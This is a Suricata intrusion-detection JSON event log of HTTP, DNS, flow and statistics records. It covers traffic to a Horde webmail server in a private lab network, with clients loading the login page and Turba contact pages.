{"timestamp":"2020-02-29T00:19:17.482856+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/turba\/delete.php","state":"CLOSED","stored":false,"size":77,"tx_id":0}} {"timestamp":"2020-02-29T00:19:17.489512+0000","flow_id":836147152779304,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1366,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:17.594290+0000","flow_id":836147152779304,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35956,"proto":"UDP","dns":{"type":"answer","id":1366,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:17.594290+0000","flow_id":836147152779304,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35956,"proto":"UDP","dns":{"type":"answer","id":1366,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:17.663401+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4062}} {"timestamp":"2020-02-29T00:19:19.000177+0000","flow_id":2124693171580563,"event_type":"flow","src_ip":"192.168.10.130","src_port":34870,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1171,"bytes_toclient":6579,"start":"2020-02-29T00:18:07.306835+0000","end":"2020-02-29T00:18:17.541754+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:22.667497+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34884,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4062},"app_proto":"http","fileinfo":{"filename":"\/turba\/search.php","state":"CLOSED","stored":false,"size":19291,"tx_id":1}} 
{"timestamp":"2020-02-29T00:19:24.000190+0000","event_type":"stats","stats":{"uptime":14816,"capture":{"kernel_packets":136721,"kernel_drops":0},"decoder":{"pkts":136725,"bytes":93889541,"invalid":192,"ipv4":135186,"ipv6":10,"ethernet":136725,"raw":0,"null":0,"sll":0,"tcp":129731,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2816,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2832,"synack":2823,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1853,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4729,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2455,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20836,"memcap_state":0,"memcap_global":0},"http":{"memuse":35546,"memcap":0}}} 
{"timestamp":"2020-02-29T00:19:29.000573+0000","flow_id":645029679087548,"event_type":"flow","src_ip":"192.168.10.122","src_port":51842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:28.540604+0000","end":"2020-02-29T00:14:28.697243+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:31.000283+0000","event_type":"stats","stats":{"uptime":14823,"capture":{"kernel_packets":136721,"kernel_drops":0},"decoder":{"pkts":136725,"bytes":93889541,"invalid":192,"ipv4":135186,"ipv6":10,"ethernet":136725,"raw":0,"null":0,"sll":0,"tcp":129731,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2816,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2832,"synack":2823,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1853,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4729,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2456,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked
":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20505,"memcap_state":0,"memcap_global":0},"http":{"memuse":35546,"memcap":0}}} {"timestamp":"2020-02-29T00:19:35.000667+0000","flow_id":658082085123380,"event_type":"flow","src_ip":"192.168.10.122","src_port":33640,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:34.701748+0000","end":"2020-02-29T00:14:34.809817+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:35.000965+0000","flow_id":959704753418051,"event_type":"flow","src_ip":"192.168.10.122","src_port":39423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:34.700227+0000","end":"2020-02-29T00:14:34.808864+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:36.000618+0000","flow_id":209077614025364,"event_type":"flow","src_ip":"192.168.10.122","src_port":45522,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:34.924308+0000","end":"2020-02-29T00:14:35.033032+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:37.321340+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067}} 
{"timestamp":"2020-02-29T00:19:37.452485+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141}} {"timestamp":"2020-02-29T00:19:37.458114+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52900,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":5873,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.455097+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236}} 
{"timestamp":"2020-02-29T00:19:37.458500+0000","flow_id":1498976572011859,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52908,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005}} {"timestamp":"2020-02-29T00:19:37.456533+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52906,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236},"app_proto":"http","fileinfo":{"filename":"\/js\/horde.js","state":"CLOSED","stored":false,"size":6422,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.458990+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280}} 
{"timestamp":"2020-02-29T00:19:37.458934+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246}} {"timestamp":"2020-02-29T00:19:37.460469+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/mozilla.css","state":"CLOSED","stored":false,"size":173,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.460688+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118}} 
{"timestamp":"2020-02-29T00:19:37.460939+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52906,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/login.js","state":"CLOSED","stored":false,"size":415,"tx_id":1}} {"timestamp":"2020-02-29T00:19:37.461204+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258}} {"timestamp":"2020-02-29T00:19:37.479806+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52904,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":29020},"app_proto":"http","fileinfo":{"filename":"\/js\/prototype.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} 
{"timestamp":"2020-02-29T00:19:37.480900+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":46054}} {"timestamp":"2020-02-29T00:19:37.561308+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:19:37.616998+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52904,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-default.png","state":"CLOSED","stored":false,"size":87,"tx_id":1}} 
{"timestamp":"2020-02-29T00:19:37.617541+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918}} {"timestamp":"2020-02-29T00:19:38.000205+0000","event_type":"stats","stats":{"uptime":14830,"capture":{"kernel_packets":136721,"kernel_drops":0},"decoder":{"pkts":136725,"bytes":93889541,"invalid":192,"ipv4":135186,"ipv6":10,"ethernet":136725,"raw":0,"null":0,"sll":0,"tcp":129731,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2816,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2832,"synack":2823,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1853,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4729,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2456,"bypassed_pruned":0,"flows_checked":2,"flows_noti
meout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19513,"memcap_state":0,"memcap_global":0},"http":{"memuse":259892,"memcap":0}}} {"timestamp":"2020-02-29T00:19:41.000397+0000","flow_id":479196697555204,"event_type":"flow","src_ip":"192.168.10.122","src_port":45154,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:39.946436+0000","end":"2020-02-29T00:14:40.054421+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:42.466236+0000","flow_id":1498976572011859,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52908,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005},"app_proto":"http","fileinfo":{"filename":"\/js\/accesskeys.js","state":"CLOSED","stored":false,"size":2729,"tx_id":0}} {"timestamp":"2020-02-29T00:19:42.474814+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118},"app_proto":"http","fileinfo":{"filename":"\/js\/login.js","state":"CLOSED","stored":false,"size":3062,"tx_id":1}} {"timestamp":"2020-02-29T00:19:42.474870+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52900,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":48239,"tx_id":1}} {"timestamp":"2020-02-29T00:19:42.474831+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52906,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/horde-power1.png","state":"CLOSED","stored":false,"size":2258,"tx_id":2}} 
{"timestamp":"2020-02-29T00:19:42.622221+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52904,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":918,"tx_id":2}} {"timestamp":"2020-02-29T00:19:45.000188+0000","event_type":"stats","stats":{"uptime":14837,"capture":{"kernel_packets":136862,"kernel_drops":0},"decoder":{"pkts":136870,"bytes":93972713,"invalid":192,"ipv4":135331,"ipv6":10,"ethernet":136870,"raw":0,"null":0,"sll":0,"tcp":129876,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2821,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2837,"synack":2828,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1858,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4740,"smtp":0,"tls":0,"dns_tcp":0,
"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2460,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19182,"memcap_state":0,"memcap_global":0},"http":{"memuse":35946,"memcap":0}}} {"timestamp":"2020-02-29T00:19:45.001812+0000","flow_id":1926025151001775,"event_type":"flow","src_ip":"192.168.10.122","src_port":47129,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:44.210095+0000","end":"2020-02-29T00:14:44.318670+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 